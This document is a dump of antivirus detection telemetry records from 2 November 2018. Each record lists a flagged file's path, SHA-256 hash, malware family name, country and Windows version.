  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181813-b08d42ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa291d7d\\AVSCAN-20181102-181318-91AE3F7E\\AVSCAN-20181102-181813-B08D42CE', filesize=64000, name='Adware/Agent.cpdes.#M1.#R1'), hash='1e1dbfbbd2200ab8bd10445b01ef228d054a09dbf8b6036d921420e625055c22', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T13:18:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104446-0627f346', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104446-0627F346', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:44:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110335-2461274c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8cb68e92\\AVSCAN-20181102-110244-1CA52070\\AVSCAN-20181102-110335-2461274C', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f360fb328a8239d7bb34a83312cdc2a71f6bc246', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\f360fb328a8239d7bb34a83312cdc2a71f6bc246', filesize=2112000, name='Adware/DealPly.38f00c.#M1.#R1'), hash='38f00cebff5d91b0b5ce6cc5e911e21ddf717f8fa39a63cd291918e6b6e4c84a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:20:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='thdlcqfd.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\THDlcQFD.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155133-8dfd9eb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-155133-8DFD9EB1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050332-9d8ff694', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050332-9D8FF694', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230023-c3f18aa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c797cb8c\\AVSCAN-20181102-225820-B71406CC\\AVSCAN-20181102-230023-C3F18AA9', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T22:00:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134139-e5dfa816', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-134139-E5DFA816', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T22:48:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='4f876be927448a884c219fa592dd4163cc19753a46a12152a34424e5c55e7582', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe11_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe11 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:30:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214715-0014d97c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-214715-0014D97C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142237-ae8ea56e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-142237-AE8EA56E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085622-ad20bc7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba66ddae\\AVSCAN-20181102-085553-A8CF33C3\\AVSCAN-20181102-085622-AD20BC7E', filesize=128000, name='TR/Patched.Ren.Gen.#M1.#R1'), hash='4f498247f5cf74378b9de7a5e03494c9fa1e4491c868c5ff318e82a7010eb68a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001fe7', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001fe7', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:53:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055626-01507162', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055626-01507162', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052838-1f3ec3c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052838-1F3EC3C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libeay32.dll', filepath='C:\\Program Files (x86)\\Common Files\\TTKN\\Bin\\libeay32.dll', filesize=1216000, name='W32/Ramnit.CD.#M1.#R1'), hash='67dbea858ed5630187e8ba64252ddc96a7017ca4c6f6e5fb5e4d2ed23fde11c4', metadata=Row(cmdline='--engine=2 --session-id=\\\\\\/YOhAkETWmYuu+DAaFktAhYW0n8Z0FsJcLYPK8Jc --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.176.200\\software_reporter_tool.exe', parentsize=13581432, timestamp='2018-11-02T14:53:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140816-7ae4b6ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb846d97\\AVSCAN-20181102-140546-6C1452DF\\AVSCAN-20181102-140816-7AE4B6BA', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:08:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154948-7a73b92e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154948-7A73B92E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:52:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061100-3be19628', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b05b3c72\\AVSCAN-20181102-060736-2087495F\\AVSCAN-20181102-061100-3BE19628', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:39:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='senddmp.exe', filepath='\\\\ts-xelcea\\share\\Acad\\acad2007\\Bin\\acadFeui\\program files\\Root\\senddmp.exe', filesize=512000, name='W32/Stanit.#M1.#R1'), hash='574987fddeabedf5730fb938f4cda915cb67b2028836d4863ed9be4baac6c1e5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:38:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061204-30aa1d49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061204-30AA1D49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053251-b5ebc6e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053251-B5EBC6E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='政协桥目录.xls', filepath='F:\\参考\\工程参考\\0-莆田招投标发布图纸\\政协桥施工图图纸\\3桥\\政协桥目录.xls', filesize=128000, name='HEUR/Mailcab.C.#M1.#R1'), hash='4ed1b248de01c8456d223f7c02d498a2e0cf8970abf73e7ce014667f0f5c1c87', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054544-82eed772', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054544-82EED772', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053212-9e938243', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053212-9E938243', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051853-c2574544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051853-C2574544', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052429-8ae8a342', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052429-8AE8A342', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062520-0b23a5e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062520-0B23A5E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052326-65285873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052326-65285873', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061646-d8dc3d06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061646-D8DC3D06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060037-971e9f0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060037-971E9F0B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052438-902d12bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052438-902D12BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053556-246b8532', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053556-246B8532', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061149-27a816b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061149-27A816B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055343-a089a862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055343-A089A862', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055009-20ecfc3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055009-20ECFC3B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051625-6a29c236', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051625-6A29C236', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062653-4250ebd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062653-4250EBD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060811-a594ea68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060811-A594EA68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061627-cd683db4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061627-CD683DB4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050957-83491d05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050957-83491D05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050459-d137871e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050459-D137871E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061607-c12989eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061607-C12989EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061145-253b79fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061145-253B79FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:44Z'), dt=datetime.date(2018, 11, 2)),
